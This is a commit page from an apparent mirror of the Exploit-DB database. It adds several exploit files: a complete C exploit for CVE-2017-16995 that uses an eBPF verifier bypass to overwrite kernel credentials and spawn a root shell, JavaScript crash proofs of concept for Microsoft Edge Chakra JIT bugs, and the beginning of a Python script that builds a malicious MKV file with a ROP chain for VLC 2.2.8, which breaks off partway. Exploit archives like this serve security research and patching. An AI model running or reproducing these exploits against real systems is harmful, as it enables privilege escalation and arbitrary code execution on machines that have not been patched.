bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

DB: 2018-07-13

Browse source 
8 changes to exploits/shellcodes

Adobe Flash Player 10.0.22 and AIR - 'intf_count' Integer Overflow
Adobe Flash Player 10.0.22 / AIR - 'intf_count' Integer Overflow
Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes
Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read
Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions

VLC media player 2.2.8 - Arbitrary Code Execution (PoC)

Linux Kernel <  4.13.9 (Ubuntu 16.04/Fedora 27) - Local Privilege Escalation

212Cafe Board - Multiple Cross-Site Scripting Vulnerabilities
212Cafe Board 0.08 Beta / 6.30 Beta - Multiple Cross-Site Scripting Vulnerabilities

123 Flash Chat - Multiple Vulnerabilities
123 Flash Chat 7.8 - Multiple Vulnerabilities

Dicoogle PACS 2.5.0 - Directory Traversal
This commit is contained in:
Offensive Security 2018-07-13 05:02:00 +00:00
parent 52954b4751
commit e76244b41a
7 changed files with 1028 additions and 4 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

495
exploits/linux/local/45010.c Normal file
View file

@ -0,0 +1,495 @@
/*
Credit @bleidl, this is a slight modification to his original POC
https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c
For details on how the exploit works, please visit
https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Tested on Ubuntu 16.04 with the following Kernels
4.4.0-31-generic
4.4.0-62-generic
4.4.0-81-generic
4.4.0-116-generic
4.8.0-58-generic
4.10.0.42-generic
4.13.0-21-generic
Tested on Fedora 27
4.13.9-300
gcc cve-2017-16995.c -o cve-2017-16995
internet@client:~/cve-2017-16995$ ./cve-2017-16995
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880038c3f500
[*] Leaking sock struct from ffff88003af5e180
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880038704600
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff880038704600
[*] credentials patched, launching shell...
#id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1000(internet)
*/
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <sys/personality.h>
char buffer[64];
int sockets[2];
int mapfd, progfd;
int doredact = 0;
#define LOG_BUF_SIZE 65536
#define PHYS_OFFSET 0xffff880000000000
char bpf_log_buf[LOG_BUF_SIZE];
static __u64 ptr_to_u64(void *ptr)
{
return (__u64) (unsigned long) ptr;
}
int bpf_prog_load(enum bpf_prog_type prog_type,
const struct bpf_insn *insns, int prog_len,
const char *license, int kern_version)
{
union bpf_attr attr = {
.prog_type = prog_type,
.insns = ptr_to_u64((void *) insns),
.insn_cnt = prog_len / sizeof(struct bpf_insn),
.license = ptr_to_u64((void *) license),
.log_buf = ptr_to_u64(bpf_log_buf),
.log_size = LOG_BUF_SIZE,
.log_level = 1,
};
attr.kern_version = kern_version;
bpf_log_buf[0] = 0;
return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}
int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
int max_entries, int map_flags)
{
union bpf_attr attr = {
.map_type = map_type,
.key_size = key_size,
.value_size = value_size,
.max_entries = max_entries
};
return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}
int bpf_update_elem(int fd, void *key, void *value, unsigned long long flags)
{
union bpf_attr attr = {
.map_fd = fd,
.key = ptr_to_u64(key),
.value = ptr_to_u64(value),
.flags = flags,
};
return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}
int bpf_lookup_elem(int fd, void *key, void *value)
{
union bpf_attr attr = {
.map_fd = fd,
.key = ptr_to_u64(key),
.value = ptr_to_u64(value),
};
return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}
#define BPF_ALU64_IMM(OP, DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_MOV64_REG(DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
#define BPF_MOV32_REG(DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU | BPF_MOV | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
#define BPF_MOV64_IMM(DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_MOV32_IMM(DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU | BPF_MOV | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_LD_IMM64(DST, IMM) \
BPF_LD_IMM64_RAW(DST, 0, IMM)
#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
((struct bpf_insn) { \
.code = BPF_LD | BPF_DW | BPF_IMM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = (__u32) (IMM) }), \
((struct bpf_insn) { \
.code = 0, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = ((__u64) (IMM)) >> 32 })
#ifndef BPF_PSEUDO_MAP_FD
# define BPF_PSEUDO_MAP_FD 1
#endif
#define BPF_LD_MAP_FD(DST, MAP_FD) \
BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
((struct bpf_insn) { \
.code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })
#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })
#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \
((struct bpf_insn) { \
.code = CODE, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = IMM })
#define BPF_EXIT_INSN() \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_EXIT, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = 0 })
#define BPF_DISABLE_VERIFIER() \
BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF), /* r2 = (u32)0xFFFFFFFF */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2), /* if (r2 == -1) { */ \
BPF_MOV64_IMM(BPF_REG_0, 0), /* exit(0); */ \
BPF_EXIT_INSN() /* } */ \
#define BPF_MAP_GET(idx, dst) \
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), /* r1 = r9 */ \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), /* r2 = fp */ \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), /* r2 = fp - 4 */ \
BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx), /* *(u32 *)(fp - 4) = idx */ \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), /* if (r0 == 0) */ \
BPF_EXIT_INSN(), /* exit(0); */ \
BPF_LDX_MEM(BPF_DW, (dst), BPF_REG_0, 0) /* r_dst = *(u64 *)(r0) */
static int load_prog() {
struct bpf_insn prog[] = {
BPF_DISABLE_VERIFIER(),
BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_1, -16), /* *(fp - 16) = r1 */
BPF_LD_MAP_FD(BPF_REG_9, mapfd),
BPF_MAP_GET(0, BPF_REG_6), /* r6 = op */
BPF_MAP_GET(1, BPF_REG_7), /* r7 = address */
BPF_MAP_GET(2, BPF_REG_8), /* r8 = value */
/* store map slot address in r2 */
BPF_MOV64_REG(BPF_REG_2, BPF_REG_0), /* r2 = r0 */
BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = 0 for exit(0) */
BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 0, 2), /* if (op == 0) */
/* get fp */
BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_10, 0),
BPF_EXIT_INSN(),
BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 1, 3), /* else if (op == 1) */
/* get skbuff */
BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_10, -16),
BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),
BPF_EXIT_INSN(),
BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 2, 3), /* else if (op == 2) */
/* read */
BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_7, 0),
BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),
BPF_EXIT_INSN(),
/* else */
/* write */
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),
BPF_EXIT_INSN(),
};
return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, sizeof(prog), "GPL", 0);
}
void info(const char *fmt, ...) {
va_list args;
va_start(args, fmt);
fprintf(stdout, "[.] ");
vfprintf(stdout, fmt, args);
va_end(args);
}
void msg(const char *fmt, ...) {
va_list args;
va_start(args, fmt);
fprintf(stdout, "[*] ");
vfprintf(stdout, fmt, args);
va_end(args);
}
void redact(const char *fmt, ...) {
va_list args;
va_start(args, fmt);
if(doredact) {
fprintf(stdout, "[!] ( ( R E D A C T E D ) )\n");
return;
}
fprintf(stdout, "[*] ");
vfprintf(stdout, fmt, args);
va_end(args);
}
void fail(const char *fmt, ...) {
va_list args;
va_start(args, fmt);
fprintf(stdout, "[!] ");
vfprintf(stdout, fmt, args);
va_end(args);
exit(1);
}
void
initialize() {
info("\n");
info("t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)\n");
info("\n");
info(" ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **\n");
info("\n");
redact("creating bpf map\n");
mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3, 0);
if (mapfd < 0) {
fail("failed to create bpf map: '%s'\n", strerror(errno));
}
redact("sneaking evil bpf past the verifier\n");
progfd = load_prog();
if (progfd < 0) {
if (errno == EACCES) {
msg("log:\n%s", bpf_log_buf);
}
fail("failed to load prog '%s'\n", strerror(errno));
}
redact("creating socketpair()\n");
if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) {
fail("failed to create socket pair '%s'\n", strerror(errno));
}
redact("attaching bpf backdoor to socket\n");
if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0) {
fail("setsockopt '%s'\n", strerror(errno));
}
}
static void writemsg() {
ssize_t n = write(sockets[0], buffer, sizeof(buffer));
if (n < 0) {
perror("write");
return;
}
if (n != sizeof(buffer)) {
fprintf(stderr, "short write: %zd\n", n);
}
}
static void
update_elem(int key, unsigned long value) {
if (bpf_update_elem(mapfd, &key, &value, 0)) {
fail("bpf_update_elem failed '%s'\n", strerror(errno));
}
}
static unsigned long
get_value(int key) {
unsigned long value;
if (bpf_lookup_elem(mapfd, &key, &value)) {
fail("bpf_lookup_elem failed '%s'\n", strerror(errno));
}
return value;
}
static unsigned long
sendcmd(unsigned long op, unsigned long addr, unsigned long value) {
update_elem(0, op);
update_elem(1, addr);
update_elem(2, value);
writemsg();
return get_value(2);
}
unsigned long
get_skbuff() {
return sendcmd(1, 0, 0);
}
unsigned long
get_fp() {
return sendcmd(0, 0, 0);
}
unsigned long
read64(unsigned long addr) {
return sendcmd(2, addr, 0);
}
void
write64(unsigned long addr, unsigned long val) {
(void)sendcmd(3, addr, val);
}
static unsigned long find_cred() {
uid_t uid = getuid();
unsigned long skbuff = get_skbuff();
/*
* struct sk_buff {
* [...24 byte offset...]
* struct sock *sk;
* };
*
*/
unsigned long sock_addr = read64(skbuff + 24);
msg("skbuff => %llx\n", skbuff);
msg("Leaking sock struct from %llx\n", sock_addr);
if(sock_addr < PHYS_OFFSET){
fail("Failed to find Sock address from sk_buff.\n");
}
/*
* scan forward for expected sk_rcvtimeo value.
*
* struct sock {
* [...]
* const struct cred *sk_peer_cred;
* long sk_rcvtimeo;
* };
*/
for (int i = 0; i < 100; i++, sock_addr += 8) {
if(read64(sock_addr) == 0x7FFFFFFFFFFFFFFF) {
unsigned long cred_struct = read64(sock_addr - 8);
if(cred_struct < PHYS_OFFSET) {
continue;
}
unsigned long test_uid = (read64(cred_struct + 8) & 0xFFFFFFFF);
if(test_uid != uid) {
continue;
}
msg("Sock->sk_rcvtimeo at offset %d\n", i * 8);
msg("Cred structure at %llx\n", cred_struct);
msg("UID from cred structure: %d, matches the current: %d\n", test_uid, uid);
return cred_struct;
}
}
fail("failed to find sk_rcvtimeo.\n");
}
static void
hammer_cred(unsigned long addr) {
msg("hammering cred structure at %llx\n", addr);
#define w64(w) { write64(addr, (w)); addr += 8; }
unsigned long val = read64(addr) & 0xFFFFFFFFUL;
w64(val);
w64(0); w64(0); w64(0); w64(0);
w64(0xFFFFFFFFFFFFFFFF);
w64(0xFFFFFFFFFFFFFFFF);
w64(0xFFFFFFFFFFFFFFFF);
#undef w64
}
int
main(int argc, char **argv) {
initialize();
hammer_cred(find_cred());
msg("credentials patched, launching shell...\n");
if(execl("/bin/sh", "/bin/sh", NULL)) {
fail("exec %s\n", strerror(errno));
}
}

0
exploits/linux/webapps/45007.txt → exploits/multiple/webapps/45007.txt
View file

15
exploits/windows/dos/45011.js Normal file
View file

@ -0,0 +1,15 @@
/*
It seems that this issue is similar to the issue 1429 (MSRC 42111). It might need to refresh the page several times to observe a crash.
PoC:
*/
let arr = new Uint32Array(1000);
for (let i = 0; i < 0x1000000; i++) {
for (let j = 0; j < 1; j++) {
i--;
i++;
}
arr[i] = 0x1234;
}

13
exploits/windows/dos/45012.js Normal file
View file

@ -0,0 +1,13 @@
/*
BoundFunction::NewInstance is used to handle calls to a bound function. The method first allocates a new argument array and copies the prepended arguments and others into the new argument array and calls the actual function. The problem is, it doesn't care about the CallFlags_ExtraArg flag which indicates that there's an extra argument (new.target in the PoC) at the end of the argument array. So the size of the new argument array created with the CallFlags_ExtraArg flag will be always 1 less then required, this leads to an OOB read.
PoC:
*/
function func() {
new.target.x;
}
let bound = func.bind({}, 1);
Reflect.construct(bound, []);

199
exploits/windows/dos/45013.js Normal file
View file

@ -0,0 +1,199 @@
/*
Here's a PoC:
*/
function opt(str) {
for (let i = 0; i < 200; i++) {
let tmp = str.charCodeAt('AAAAAAAAAA' + str + 'BBBBBBBBBB');
}
}
opt('x');
opt(0x1234);
/*
Here's the IR code of the PoC before the global optimization phase:
---------
FunctionEntry #
s18.u64 = ArgIn_A prm1<32>.var #
s9.var = LdSlot s32(s18l[53]).var #
s7.var = LdSlot s20(s18l[51]).var #
s8.var = LdSlot s19(s18l[52]).var #
s1[Object].var = Ld_A 0x7FFFF47A0000 (GlobalObject)[Object].var #
s2.var = LdC_A_I4 0 (0x0).i32 #
s3.var = LdC_A_I4 200 (0xC8).i32 #
s4.var = LdC_A_I4 1 (0x1).i32 #
s5[String].var = LdStr 0x7FFFF47B9080 ("AAAAAAAAAA")[String].var #
s6[String].var = LdStr 0x7FFFF47B90A0 ("BBBBBBBBBB")[String].var #
s17.var = InitLoopBodyCount #0009
---------
$L1: >>>>>>>>>>>>> LOOP TOP >>>>>>>>>>>>> Implicit call: no #000b
Line 2: i < 200; i++) {
Col 21: ^
StatementBoundary #1 #000b
s17.i32 = IncrLoopBodyCount s17.i32 #000b
BrLt_A $L3, s8.var, s3.var #000b
Br $L2 #0010
---------
$L3: #0013
Line 3: let tmp = str.charCodeAt('AAAAAAAAAA' + str + 'BBBBBBBBBB');
Col 9: ^
StatementBoundary #2 #0013
s13.var = Ld_A s7.var #0013
CheckFixedFld s21(s13->charCodeAt)<0,m~=,+-,s?,s?>.var #0016 Bailout: #0016 (BailOutFailedEquivalentFixedFieldTypeCheck)
s12[ffunc][Object].var = Ld_A 0x7FFFF47972C0 (FunctionObject).var #
s22.var = StartCall 2 (0x2).i32 #001a
s36.var = BytecodeArgOutCapture s13.var #001d
s24[String].var = Conv_PrimStr s5.var #0020
s25[String].var = Conv_PrimStr s7.var #0020
s26[String].var = Conv_PrimStr s6.var #0020
ByteCodeUses s7 #0020
s27.var = SetConcatStrMultiItemBE s24[String].var #0020
s28.var = SetConcatStrMultiItemBE s25[String].var, s27.var #0020
s29.var = SetConcatStrMultiItemBE s26[String].var, s28.var #0020
s14[String].var = NewConcatStrMultiBE 3 (0x3).u32, s29.var #0020
s35.var = BytecodeArgOutCapture s14.var #0025
arg1(s34)<0>.u64 = ArgOut_A_InlineSpecialized 0x7FFFF47972C0 (FunctionObject).var, arg2(s30)<8>.var #0028
arg1(s23)<0>.var = ArgOut_A s36.var, s22.var #0028
arg2(s30)<8>.var = ArgOut_A s35.var, arg1(s23)<0>.var #0028
ByteCodeUses s12 #0028
s31[CanBeTaggedValue_Int_Number].var = CallDirect String_CharCodeAt.u64, arg1(s34)<0>.u64 #0028
s9.var = Ld_A s31.var #0032
Line 2: i++) {
Col 30: ^
StatementBoundary #3 #0035
s8.var = Incr_A s8.var #0035
Br $L1 #0038
---------
$L2: #003d
Line 5: }
Col 1: ^
StatementBoundary #4 #0038
s16.i64 = Ld_I4 61 (0x3D).i64 #003d
s19(s18l[52]).var = StSlot s8.var #003e
s32(s18l[53]).var = StSlot s9.var #003e
StLoopBodyCount s17.i32 #003e
Ret s16.i64 #003e
----------------------------------------------------------------------------------------
After the global optimization phase:
---------
FunctionEntry #
s18.u64 = ArgIn_A prm1<32>.var! #
s9[LikelyCanBeTaggedValue_Int].var = LdSlot s32(s18l[53])[LikelyCanBeTaggedValue_Int].var! #
s7<s44>[LikelyCanBeTaggedValue_String].var = LdSlot s20(s18l[51])[LikelyCanBeTaggedValue_String].var! #
s8[LikelyCanBeTaggedValue_Int].var = LdSlot s19(s18l[52])[LikelyCanBeTaggedValue_Int].var! #
s5[String].var = LdStr 0x7FFFF47B9080 ("AAAAAAAAAA")[String].var #
s6[String].var = LdStr 0x7FFFF47B90A0 ("BBBBBBBBBB")[String].var #
s17.var = InitLoopBodyCount #0009
s42(s8).i32 = FromVar s8[LikelyCanBeTaggedValue_Int].var # Bailout: #000b (BailOutIntOnly)
s27.var = SetConcatStrMultiItemBE s5[String].var #0020
s49[String].var = Conv_PrimStr s7<s44>[String].var #
s28.var = SetConcatStrMultiItemBE s49[String].var!, s27.var! #0020
s29.var = SetConcatStrMultiItemBE s6[String].var, s28.var! #0020
s14[String].var = NewConcatStrMultiBE 3 (0x3).u32, s29.var! #0020
BailTarget # Bailout: #000b (BailOutShared)
---------
$L1: >>>>>>>>>>>>> LOOP TOP >>>>>>>>>>>>> Implicit call: no #000b
Line 2: i < 200; i++) {
Col 21: ^
StatementBoundary #1 #000b
s17.i32 = IncrLoopBodyCount s17.i32! #000b
BrGe_I4 $L2, s42(s8).i32, 200 (0xC8).i32 #000b
Line 3: let tmp = str.charCodeAt('AAAAAAAAAA' + str + 'BBBBBBBBBB');
Col 9: ^
StatementBoundary #2 #0013
CheckFixedFld s43(s7<s44>[LikelyCanBeTaggedValue_String]->charCodeAt)<0,m~=,++,s44!,s45+,{charCodeAt(0)~=}>.var! #0016 Bailout: #0016 (BailOutFailedEquivalentFixedFieldTypeCheck)
s22.var = StartCall 2 (0x2).i32 #001a
arg1(s34)<0>.u64 = ArgOut_A_InlineSpecialized 0x7FFFF47972C0 (FunctionObject).var, arg2(s30)<8>.var! #0028
arg1(s23)<0>.var = ArgOut_A s7<s44>[String].var, s22.var! #0028
arg2(s30)<8>.var = ArgOut_A s14[String].var, arg1(s23)<0>.var! #0028
s31[CanBeTaggedValue_Int_Number].var = CallDirect String_CharCodeAt.u64, arg1(s34)<0>.u64! #0028 Bailout: #0032 (BailOutOnImplicitCalls)
s9[CanBeTaggedValue_Int_Number].var = Ld_A s31[CanBeTaggedValue_Int_Number].var! #0032
Line 2: i++) {
Col 30: ^
StatementBoundary #3 #0035
s42(s8).i32 = Add_I4 s42(s8).i32!, 1 (0x1).i32 #0035
Br $L1 #0038
---------
$L2: #003d
Line 5: }
Col 1: ^
StatementBoundary #4 #003d
s8[CanBeTaggedValue_Int].var = ToVar s42(s8).i32! #003e
s19(s18l[52])[CanBeTaggedValue_Int].var! = StSlot s8[CanBeTaggedValue_Int].var! #003e
s32(s18l[53])[LikelyCanBeTaggedValue_Int_Number].var! = StSlot s9[LikelyCanBeTaggedValue_Int_Number].var! #003e
StLoopBodyCount s17.i32! #003e
Ret 61 (0x3D).i32 #003e
----------------------------------------------------------------------------------------
Crash log:
[----------------------------------registers-----------------------------------]
RAX: 0x1000000001234
RBX: 0x7ffff47c5ff4 --> 0x31 ('1')
RCX: 0x7ff7f4600000 --> 0x0
RDX: 0x0
RSI: 0x80000001 --> 0x0
RDI: 0x1000000001234
RBP: 0x7ffffffef410 --> 0x7ffffffef590 --> 0x7ffffffefb90 --> 0x7ffffffefc90 --> 0x7ffffffefef0 --> 0x7fffffff48b0 (--> ...)
RSP: 0x7ffffffef340 --> 0x7ffffffef3b0 --> 0x1000000001234
RIP: 0x7ff7f385017a (cmp QWORD PTR [rax],r10)
R8 : 0x55555cfbc870 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp)
R9 : 0x7ff7f4600000 --> 0x0
R10: 0x55555cfbc870 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp)
R11: 0x7ffff47b9080 --> 0x55555cfa0f18 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp)
R12: 0x0
R13: 0x7ffff47b36b0 --> 0x55555cfbee70 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp)
R14: 0x0
R15: 0x1000000001234
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x7ff7f385016e: mov BYTE PTR [rcx+rax*1],0x1
0x7ff7f3850172: mov rax,QWORD PTR [rbp-0x10]
0x7ff7f3850176: mov r10,QWORD PTR [rbp-0x18]
=> 0x7ff7f385017a: cmp QWORD PTR [rax],r10
0x7ff7f385017d: je 0x7ff7f385037c
0x7ff7f3850183: mov rcx,rax
0x7ff7f3850186: mov QWORD PTR [rbp-0x18],rcx
0x7ff7f385018a: mov eax,DWORD PTR [rcx+0x18]
[------------------------------------stack-------------------------------------]
0000| 0x7ffffffef340 --> 0x7ffffffef3b0 --> 0x1000000001234
0008| 0x7ffffffef348 --> 0x7ffff471c1e0 --> 0x55555cf48850 --> 0x555556c17100 (<Js::FunctionBody::Finalize(bool)>: push rbp)
0016| 0x7ffffffef350 --> 0x7ffff471c298 --> 0x7ffff4774140 --> 0x10f1215030708
0024| 0x7ffffffef358 --> 0x7ffff471c298 --> 0x7ffff4774140 --> 0x10f1215030708
0032| 0x7ffffffef360 --> 0x7ffffffef410 --> 0x7ffffffef590 --> 0x7ffffffefb90 --> 0x7ffffffefc90 --> 0x7ffffffefef0 (--> ...)
0040| 0x7ffffffef368 --> 0x555556c40b8b (<Js::CompactCounters<Js::FunctionBody, Js::FunctionBody::CounterFields>::Get(Js::FunctionBody::CounterFields) const+139>: movzx ecx,BYTE PTR [rbp-0x22])
0048| 0x7ffffffef370 --> 0x7ffff47a4238 --> 0x7ffff47c5fe0 --> 0x7ffff4796a40 --> 0x55555cf4df58 --> 0x555556cb7a20 (<JsUtil::List<Js::LoopEntryPointInfo*, Memory::Recycler, false, Js::CopyRemovePolicy, DefaultComparer>::IsReadOnly() const>: push rbp)
0056| 0x7ffffffef378 --> 0x7ffffffef4a0 --> 0x7ffffffef4c0 --> 0x7ffffffef590 --> 0x7ffffffefb90 --> 0x7ffffffefc90 (--> ...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007ff7f385017a in ?? ()
Background:
Invariant operations like SetConcatStrMultiItemBE in a loop can be hoisted to the landing pad of the loop to avoid performing the same operation multiple times. When Chakra hoists a SetConcatStrMultiItemBE instruction, it creates a new Conv_PrimStr instruction to ensure the type of the Src1 of the SetConcatStrMultiItemBE instruction to be String and inserts it right before the SetConcatStrMultiItemBE instruction.
What happens here is:
1. The CheckFixedFld instruction ensures the type of s7 to be String.
2. Chakra judges that the CheckFixedFld instruction can't be hoisted in the case. It remains in the loop.
3. Chakra judges that the SetConcatStrMultiItemBE instructions can be hoisted. It hoists them along with a newly created Conv_PrimStr instruction, but without invalidating the type of s7 (String).
4. So the "s49[String].var = Conv_PrimStr s7<s44>[String].var" instruction is inserted into the landing pad. Since s7 is already assumed to be of String, the instruction will have no effects at all.
5. No type check will be performed. It will result in type confusion.
*/

297
exploits/windows/local/44979.py Executable file
View file

@ -0,0 +1,297 @@
# Exploit Title: VLC media player 2.2.8 - Arbitrary Code Execution PoC
# Date: 2018-06-06
# Exploit Author: Eugene Ng
# Vendor Homepage: https://www.videolan.org/vlc/index.html
# Software Link: http://download.videolan.org/pub/videolan/vlc/2.2.8/win64/vlc-2.2.8-win64.exe
# Version: 2.2.8
# Tested on: Windows 10 x64
# CVE: CVE-2018-11529
#
# 1. Description
#
# VLC media player through 2.2.8 is prone to a Use-After-Free (UAF) vulnerability. This issue allows
# an attacker to execute arbitrary code in the context of the logged-in user via crafted MKV files. Failed
# exploit attempts will likely result in denial of service conditions.
#
# Exploit can work on both 32 bits and 64 bits of VLC media player.
#
# 2. Proof of Concept
#
# Generate MKV files using python
# Open VLC media player
# Drag and drop poc.mkv into VLC media player (more reliable than double clicking)
#
# 3. Solution
#
# Update to version 3.0.3
# https://get.videolan.org/vlc/3.0.3/win64/vlc-3.0.3-win64.exe
import uuid
from struct import pack
class AttachedFile(object):
def __init__(self, data):
self.uid = '\x46\xae' + data_size(8) + uuid.uuid4().bytes[:8]
self.name = '\x46\x6e' + data_size(8) + uuid.uuid4().bytes[:8]
self.mime = '\x46\x60' + data_size(24) + 'application/octet-stream'
self.data = '\x46\x5c' + data_size(len(data)) + data
self.header = '\x61\xa7' + data_size(len(self.name) + len(self.data) + len(self.mime) + len(self.uid))
def __str__(self):
return self.header + self.name + self.mime + self.uid + self.data
def to_bytes(n, length):
h = '%x' % n
s = ('0'*(len(h) % 2) + h).zfill(length*2).decode('hex')
return s
def data_size(number, numbytes=range(1, 9)):
# encode 'number' as an EBML variable-size integer.
size = 0
for size in numbytes:
bits = size*7
if number <= (1 << bits) - 2:
return to_bytes(((1 << bits) + number), size)
raise ValueError("Can't store {} in {} bytes".format(number, size))
def build_data(size, bits, version):
target_addresses = {
'64': 0x40000040,
'32': 0x22000020,
}
target_address = target_addresses[bits]
exit_pointers = {
'64': {
'2.2.8': 0x00412680,
},
'32': {
'2.2.8': 0x00411364,
}
}
pExit = exit_pointers[bits][version]
rop_gadgets = {
'64': {
'2.2.8': [
0x004037ac, # XCHG EAX,ESP # ROL BL,90H # CMP WORD PTR [RCX],5A4DH # JE VLC+0X37C0 # XOR EAX,EAX # RET
0x00403b60, # POP RCX # RET
target_address, # lpAddress
0x004011c2, # POP RDX # RET
0x00001000, # dwSize
0x0040ab70, # JMP VirtualProtect
target_address + 0x500, # Shellcode
],
},
'32': {
'2.2.8': [
0x0040ae91, # XCHG EAX,ESP # ADD BYTE PTR [ECX],AL # MOV EAX,DWORD PTR [EAX] # RET
0x00407086, # POP EDI # RETN [vlc.exe]
0x00000040, # 0x00000040-> edx
0x0040b058, # MOV EDX,EDI # POP ESI # POP EDI # POP EBP # RETN [vlc.exe]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x004039c7, # POP EAX # POP ECX # RETN [vlc.exe]
0x22000030, # Filler (compensate) for rol [eax] below
0x41414141, # Filler (compensate)
0x004039c8, # POP ECX # RETN [vlc.exe]
0x0041193d, # &Writable location [vlc.exe]
0x00409d18, # POP EBX # RETN [vlc.exe]
0x00000201, # 0x00000201-> ebx
0x0040a623, # POP EBP # RETN [vlc.exe]
0x0040a623, # POP EBP # RETN [vlc.exe]
0x004036CB, # POP ESI # RETN [vlc.exe]
